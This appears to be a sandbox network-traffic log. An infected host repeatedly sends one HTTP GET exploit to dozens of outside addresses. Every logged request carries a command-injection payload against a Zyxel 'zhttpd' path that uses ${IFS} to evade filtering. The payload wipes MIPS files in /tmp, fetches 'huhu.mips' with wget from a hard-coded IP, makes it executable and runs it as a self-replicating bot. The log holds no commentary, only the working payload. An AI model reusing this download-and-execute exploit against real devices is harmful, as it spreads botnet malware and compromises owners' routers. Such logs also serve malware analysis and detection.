                                                Jan 29, 2024 07:07:57.522094965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6634192.168.2.2338878121.77.243.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522138119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6635192.168.2.236014237.254.156.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522186041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6636192.168.2.2358268192.33.144.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522197008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6637192.168.2.2350234220.44.14.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522244930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6638192.168.2.233969496.151.84.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522285938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6639192.168.2.2336114134.71.150.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522322893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6640192.168.2.2359200131.203.12.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522387981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6641192.168.2.2348320196.32.196.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522401094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6642192.168.2.2355160158.157.185.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522429943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6643192.168.2.2353998167.53.165.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522481918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6644192.168.2.2351438159.30.135.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522520065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6645192.168.2.2350636219.25.62.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522551060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6646192.168.2.235616053.208.127.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522588968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6647192.168.2.2354220159.14.143.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522629976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6648192.168.2.2337368183.32.111.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522650957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6649192.168.2.235418648.110.115.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522691011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6650192.168.2.233415847.118.242.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522716999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6651192.168.2.2354540107.56.187.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522768021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6652192.168.2.2348534129.135.183.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522809982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6653192.168.2.234536657.226.159.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522840023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6654192.168.2.234057827.44.215.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522866964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6655192.168.2.2358244157.175.246.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522912979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6656192.168.2.2346178212.254.0.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522943974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6657192.168.2.2348832180.46.0.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.522967100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6658192.168.2.2345864193.202.153.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523020029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6659192.168.2.235938684.220.157.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523082018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6660192.168.2.235504488.14.216.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523097038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6661192.168.2.2349424170.37.43.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523118019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6662192.168.2.2360574222.26.33.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523185968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6663192.168.2.2334474198.167.45.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523205042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6664192.168.2.234691240.92.30.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523248911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6665192.168.2.2344352204.190.156.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523302078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6666192.168.2.234370034.34.121.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523333073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6667192.168.2.235307662.155.21.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523363113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6668192.168.2.233304460.73.72.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523412943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6669192.168.2.2347190165.191.240.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523448944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6670192.168.2.235732498.238.223.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523468971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6671192.168.2.2345884101.26.133.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523507118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6672192.168.2.234548088.238.94.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523535013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6673192.168.2.2334936112.117.22.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523566008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6674192.168.2.233762024.155.223.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523617983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6675192.168.2.2347938161.0.32.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523646116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6676192.168.2.235968267.165.87.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523682117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6677192.168.2.2358804124.40.107.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523715019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6678192.168.2.235636479.217.214.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523766041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6679192.168.2.2349132115.48.162.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523780107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6680192.168.2.2333164159.191.52.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523874998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6681192.168.2.2343954189.219.198.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523874998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6682192.168.2.2337182202.156.175.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523924112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6683192.168.2.2337322104.97.103.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523937941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6684192.168.2.2354290204.63.170.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.523977995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6685192.168.2.2344206117.66.186.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524022102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6686192.168.2.2341110194.162.39.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524065971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6687192.168.2.234842297.55.237.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524082899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6688192.168.2.2349576173.238.196.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524135113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6689192.168.2.235763898.141.15.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524178982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6690192.168.2.2359942180.1.36.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524195910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6691192.168.2.234310687.230.93.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524255037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6692192.168.2.2334820180.201.232.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524292946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6693192.168.2.2346062206.16.80.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524322033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6694192.168.2.233926275.139.194.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524350882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6695192.168.2.2339006161.16.64.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524391890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6696192.168.2.235101618.204.61.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:57.524437904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6697192.168.2.2342840108.147.149.109443
                                                TimestampBytes transferredDirectionData
